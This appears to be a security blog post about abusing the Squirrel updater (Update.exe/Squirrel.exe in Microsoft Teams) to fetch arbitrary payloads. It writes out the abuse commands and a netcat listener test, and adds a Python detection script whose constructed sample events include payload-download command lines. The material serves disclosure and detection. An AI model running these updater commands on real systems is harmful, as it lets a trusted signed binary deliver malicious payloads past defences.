It was recently found that Microsoft Teams can be abused by malicious parties to download payloads. This is due to its underlying auto-update mechanism, called Squirrel. It's not just Microsoft Teams that uses this: GitHub, UiPath and WhatsApp also use Squirrel behind the scenes.
It was recently found that Squirrel.exe and the Microsoft Teams Update.exe can be run with caller-supplied arguments, including one that points the updater at an arbitrary URL. Because the updater is a legitimate, signed component of Teams, malicious parties can use it to fetch a payload without dropping an obviously malicious downloader of their own.
You don't need to be an administrator, and you can test this yourself by running either of the following:
Update.exe --update=[Payload URL]
Squirrel.exe --update=[Payload URL]
The example below shows the client establishing a connection to my Netcat listener, just to prove that it will connect. To reproduce it, start a listener you control (for example, nc -lvp 8080) and use http://<listener-ip>:8080/ as the payload URL; the inbound request from Update.exe is the proof that the updater will reach out to whatever address it is given.
Other arguments can be used in the same way, such as --download and --updateRollback.
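From the defender's side, the useful signal is a Squirrel binary (Update.exe or Squirrel.exe) being launched with one of the URL-taking switches above, especially from an interactive shell rather than from Teams itself. The following detection script is an added example and is not part of the original post or of the Squirrel project; it runs over constructed process-creation records shaped like Sysmon Event ID 1 (Image, CommandLine, ParentImage). The sample events, paths and IP addresses are all made up for the example, and the allowed_hosts allow-list is an assumed tuning knob you would fill with the update hosts your environment legitimately uses.

```python
"""Flag Update.exe / Squirrel.exe launches that carry a URL-taking switch.

Added example, not from the original post. Input records are shaped like
Sysmon Event ID 1; the SAMPLE_EVENTS below are constructed for this example
and use documentation IP ranges, not real infrastructure.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, Iterable, Iterator, List, Tuple
from urllib.parse import urlparse

# Executables named in the post. Compared on the lower-cased basename because
# Teams installs Update.exe under the user's profile, not a fixed path.
SQUIRREL_IMAGES = {"update.exe", "squirrel.exe"}

# Canonical spelling of each switch the post lists, keyed by lower-case name.
URL_SWITCHES = {
    "update": "--update",
    "download": "--download",
    "updaterollback": "--updateRollback",
}

# Squirrel's option parser accepts "--update=URL", "--update:URL" and
# "--update URL", so all three separators are matched; the value may be quoted.
URL_ARG_RE = re.compile(
    r'--(updateRollback|update|download)(?:[=:]|\s+)"?([^"\s]+)"?',
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    image: str
    parent: str
    argument: str
    url: str


def squirrel_url_args(cmdline: str) -> Iterator[Tuple[str, str]]:
    """Yield (switch, url) for every URL-taking Squirrel switch in a command line."""
    for m in URL_ARG_RE.finditer(cmdline):
        yield URL_SWITCHES[m.group(1).lower()], m.group(2)


def scan(events: Iterable[Dict[str, str]],
         allowed_hosts: FrozenSet[str] = frozenset()) -> List[Finding]:
    """Return one Finding per Squirrel launch whose URL host is not allow-listed.

    allowed_hosts is an assumed tuning knob: populate it with the hosts your
    environment's updaters are expected to contact. Left empty, every URL
    handed to Update.exe/Squirrel.exe is reported.
    """
    findings: List[Finding] = []
    for ev in events:
        image = ntpath.basename(ev.get("Image", "")).lower()
        if image not in SQUIRREL_IMAGES:
            continue  # a non-Squirrel binary with these switches is a different story
        for switch, url in squirrel_url_args(ev.get("CommandLine", "")):
            host = (urlparse(url).hostname or "").lower()
            if host in allowed_hosts:
                continue
            findings.append(Finding(ev["Image"], ev.get("ParentImage", ""), switch, url))
    return findings


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    # Benign: Teams launching itself through Update.exe, no URL switch present.
    {"Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    # The post's test command, launched from cmd.exe against an ad hoc listener.
    {"Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --update=http://198.51.100.7:8080/',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # --download with a space separator, quoted URL and lower-case image name.
    {"Image": r"C:\Users\alice\Downloads\squirrel.exe",
     "CommandLine": r'squirrel.exe --download "https://203.0.113.5/payload.nupkg"',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # --updateRollback form.
    {"Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
     "CommandLine": r"Update.exe --updateRollback=http://198.51.100.7:8080/",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # Same switch on a non-Squirrel binary: ignored by this rule.
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe --update=http://198.51.100.7/",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.argument:<17} {f.url:<40} parent={ntpath.basename(f.parent)}")
```

Run as-is it reports three launches (the --update, --download and --updateRollback records) and stays quiet on Teams' own --processStart launch and on notepad.exe. Passing allowed_hosts=frozenset({"203.0.113.5"}) drops the --download record, which is how you would suppress a known-good update host once you have confirmed it.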